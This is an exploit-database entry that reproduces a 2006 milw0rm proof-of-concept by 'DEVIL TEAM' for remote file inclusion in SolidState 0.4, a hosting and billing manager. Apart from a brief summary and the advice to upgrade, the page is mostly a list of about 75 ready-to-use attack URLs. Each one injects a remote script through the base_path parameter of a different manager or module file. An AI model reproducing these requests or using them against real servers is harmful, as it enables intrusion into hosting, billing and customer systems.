header-logo
Suggest Exploit
vendor:
SolidState
by:
Kacper (a.k.a Rahim)
7,5
CVSS
HIGH
Multiple Include Vulnerabilities
98
CWE
Product Name: SolidState
Affected Version From: 0.4
Affected Version To: 0.4
Patch Exists: YES
Related CWE: N/A
CPE: a:solid-state:solidstate
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

SolidState <= 0.4 Multiple Include Vulnerabilities

SolidState version 0.4 is vulnerable to multiple include vulnerabilities. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This will allow the attacker to include arbitrary files from the web server.

Mitigation:

Upgrade to the latest version of SolidState
Source

Exploit-DB raw data:

:::::::::  :::::::::: :::     ::: ::::::::::: :::        
:+:    :+: :+:        :+:     :+:     :+:     :+:        
+:+    +:+ +:+        +:+     +:+     +:+     +:+        
+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
+#+    +#+ +#+         +#+   +#+      +#+     +#+        
#+#    #+# #+#          #+#+#+#       #+#     #+#        
#########  ##########     ###     ########### ########## 
::::::::::: ::::::::::     :::     ::::    ::::  
    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
    +#+     +#+        +#+     +#+ +#+       +#+ 
    #+#     #+#        #+#     #+# #+#       #+# 
    ###     ########## ###     ### ###       ### 
	
	
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- SolidState <= 0.4 Multiple Include Vulnerabilities
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: SolidState v0.4
- [Script site: http://www.solid-state.org/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-    DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
+
-          Contact: kacper1964@yahoo.pl
-                        or
-           http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
-                 SkD, nukedclx, Ramzes
-
- Greetz for all users DEVIL TEAM IRC Channel !!
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-            Z Dedykacja dla osoby,
-         bez ktorej nie mogl bym zyc...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:



http://www.site.com/[solidstate_path]/manager/pages/AccountsPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/AddInvoicePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/AddIPAddressPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/AddPaymentPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/AddTaxRulePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/AssignDomainPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/AssignHostingPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/AssignProductPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/BillingPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/BillingPaymentPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/BrowseAccountsPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/BrowseInvoicesPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ConfigureEditUserPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ConfigureNewUserPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ConfigureNewUserReceiptPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ConfigureUsersPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/DeleteAccountPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/DeleteDomainServicePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/DeleteHostingServicePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/DeleteInvoicePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/DeleteProductPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/DeleteServerPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/DomainServicesPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/DomainsPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/EditAccountPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/EditDomainPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/EditDomainServicePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/EditHostingServicePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/EditPaymentPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/EditProductPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/EditServerPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/EmailInvoicePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ExecuteOrderPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ExpiredDomainsPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/FulfilledOrdersPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/GenerateInvoicesPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/HomePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/InactiveAccountsPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/IPManagerPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/LoginPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/LogPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ModulesPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/NewAccountPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/NewDomainServicePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/NewProductPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/OutstandingInvoicesPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/PendingAccountsPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/PendingOrdersPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/PrintInvoicePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ProductsPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/RegisterDomainPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/RegisteredDomainsPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ServersPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ServicesHostingServicesPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ServicesNewHostingPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ServicesPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ServicesWebHostingPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/SettingsPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/TaxesPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/TransferDomainPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ViewAccountPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ViewDomainServicePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ViewHostingServicePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ViewInvoicePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ViewLogMessagePage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ViewOrderPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ViewProductPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/ViewServerPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/manager/pages/WelcomeEmailPage.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/modules/RegistrarModule.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/modules/SolidStateModule.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/modules/authorizeaim/authorizeaim.class.php?base_path=[evil_scripts]

http://www.site.com/[solidstate_path]/modules/authorizeaim/pages/AAIMConfigPage.class.php?base_path=[evil_scripts]

greetz ;-)

#DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam

# milw0rm.com [2006-09-21]

Navigation

Suggest Exploit

Services By CQR